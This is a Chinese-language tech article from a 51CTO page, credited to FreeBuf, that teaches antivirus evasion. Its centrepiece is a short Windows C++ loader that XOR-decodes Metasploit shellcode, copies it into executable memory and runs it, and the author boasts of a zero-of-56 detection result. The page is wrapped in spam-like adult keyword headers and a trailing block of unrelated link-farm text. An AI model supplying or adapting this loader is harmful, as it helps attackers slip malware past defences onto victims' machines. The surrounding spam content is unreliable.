成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何利用十行代碼,繞過殺毒軟件實(shí)現(xiàn)免殺?

安全 網(wǎng)站安全
我原本打算寫一篇冗長的博客講述針對不同殺毒軟件的繞過技術(shù),但當(dāng)我開始著手寫教程的第一章并上傳樣本到 virustotal 后,我震驚了!樣本得到了 0/56 的檢測率。于是我決定扔掉先前的長篇大論,轉(zhuǎn)而記錄這個快速、令人難以置信的簡單方法。

我原本打算寫一篇冗長的博客講述針對不同殺毒軟件的繞過技術(shù),但當(dāng)我開始著手寫教程的***章并上傳樣本到 virustotal 后,我震驚了!樣本得到了 0/56 的檢測率。于是我決定扔掉先前的長篇大論,轉(zhuǎn)而記錄這個快速、令人難以置信的簡單方法。

[[164612]]

我相信大部分的讀者都會同意這個觀點(diǎn),繞過大部分殺毒軟件的基本方法都很平常沒什么特殊的。然而,我也偶爾會遇到一些人僅僅依靠工具生成二進(jìn)制文件,這些文件很容易被殺毒軟件通過指紋標(biāo)記出來。本文主要是為這些人所準(zhǔn)備的。

在我們開始接觸這段小巧的 C++ 代碼前,我想先介紹一個可以非常棒的制造免殺的工具 Veil-Evasion (Veil-Framework的一部分)。這個工具非常神奇 (感謝 @harmj0y和他的小伙伴們創(chuàng)建了這個神奇的項(xiàng)目),在幾乎所有情況下,它都沒有讓我失望過。如果有,那我就要批評那些總是不停生成二進(jìn)制文件然后上傳到 virustotal 進(jìn)行測試的人。如果你不這么做,那就會更加美好了。

無論如何,這就引出了一個問題,既然像 Veil-Evasion 這類的工具這么神奇,那為什么你要關(guān)心如何自己在二進(jìn)制文件加入 shellcode?原因有很多:

大牛都很忙而且工具有些過時。

工具生成的二進(jìn)制都擁有相似的指紋,不是指 payload,而是說工具編譯二進(jìn)制的結(jié)構(gòu)有相似的指紋。

作為一個滲透測試工作者,你應(yīng)當(dāng)知道如何做。

在你看下面的代碼前,你應(yīng)該注意到這是針對 Windows 平臺的,很明顯代碼中有 windows.h 的引用。

  1. #include <windows.h> 
  2. #include <iostream> 
  3. int main(int argc, char **argv) { 
  4.  char b[] = {/* 插入你經(jīng)過與'x'異或操作后的shellcode代碼,例如:0x4C,0x4F, 0x4C */}; 
  5.  char c[sizeof b]; 
  6.  for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} 
  7.  void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
  8.  memcpy(exec, c, sizeof c); 
  9.  ((void(*)())exec)(); 

很簡單,上面的代碼創(chuàng)建了一個可以自行添加包含 shellcode 的字符數(shù)組,關(guān)鍵點(diǎn)在于將你的 shellcode 與小寫字母 ‘x’ 執(zhí)行異或操作,然后分配一些內(nèi)存,拷貝字符數(shù)組到分配的內(nèi)存中,***執(zhí)行它。需要特別注意的是,你要先將 shellcode 與你選擇的關(guān)鍵字(本例中為 ‘x’)進(jìn)行異或操作,然后將 shellcode 放入到上面代碼中并編譯。

這時你可能會問“就這樣?”。我了解你的感受,因?yàn)楫?dāng)時我也是這么想的,在寫完***章內(nèi)容并上傳樣本到 virustotal 后并收到 0/56 的檢測率。我想強(qiáng)調(diào)這是一個令人難以置信的簡單和基礎(chǔ)的技術(shù),但它成功率卻出奇的高。

如何利用十行代碼,繞過殺毒軟件實(shí)現(xiàn)免殺?

 

你生成二進(jìn)制文件的 SHA256 值可能跟我樣本的不太一樣,我樣本中包含的 shellcode 是由 metasploit framework 生成的。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2016-04-05 11:40:17

殺毒51CTOIT技術(shù)周刊

2016-05-30 17:51:34

網(wǎng)絡(luò)安全技術(shù)周刊

2015-12-25 16:23:44

2010-09-02 17:20:34

2022-03-14 09:57:30

Python代碼

2022-02-08 19:34:01

微軟Windows 11

2010-04-22 10:01:14

2022-07-07 15:50:19

Python開發(fā)功能

2009-05-11 14:24:42

2009-04-14 08:30:48

2010-09-01 11:06:17

殺毒軟件

2010-09-25 10:29:43

瑞星在線殺毒

2015-06-08 10:23:40

2009-12-14 13:51:11

賽門鐵克殺毒軟件

2010-09-25 10:51:03

2010-09-25 11:29:23

2015-03-25 19:54:29

2010-09-25 11:40:33

2021-11-11 23:02:16

電腦垃圾軟件

2015-01-07 16:26:01

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲一区二区三区在线视频 | 国产精品成人一区 | 午夜激情在线 | 日操操| 国产一卡二卡三卡 | 国产精品高潮呻吟久久 | 国产91一区 | 伊人伊成久久人综合网站 | 日韩手机视频 | 91免费福利在线 | 国产一二三区精品视频 | 国产精品一区二区电影 | 在线视频亚洲 | 中文字幕1区2区3区 亚洲国产成人精品女人久久久 | 一级黄色影片在线观看 | 精品久久久久久久久久久久久久 | 欧美性tv | 亚洲国产成人精品女人 | 亚洲黄色一级 | 在线国产一区二区 | 日韩免费电影 | 少妇精品久久久久久久久久 | 91免费看片| 先锋av资源在线 | 成人h视频在线 | 一区二区三区精品视频 | 成人午夜网站 | 婷婷久久综合 | 久久9精品 | 国产精品中文字幕在线观看 | 天天草天天干天天 | 亚洲导航深夜福利涩涩屋 | 日韩成人在线播放 | 免费久久网 | 欧美 日本 国产 | 欧美另类视频 | 欧美一级二级在线观看 | 在线黄色影院 | 欧美日韩三级 | 999久久久国产精品 欧美成人h版在线观看 | 国产区精品在线观看 |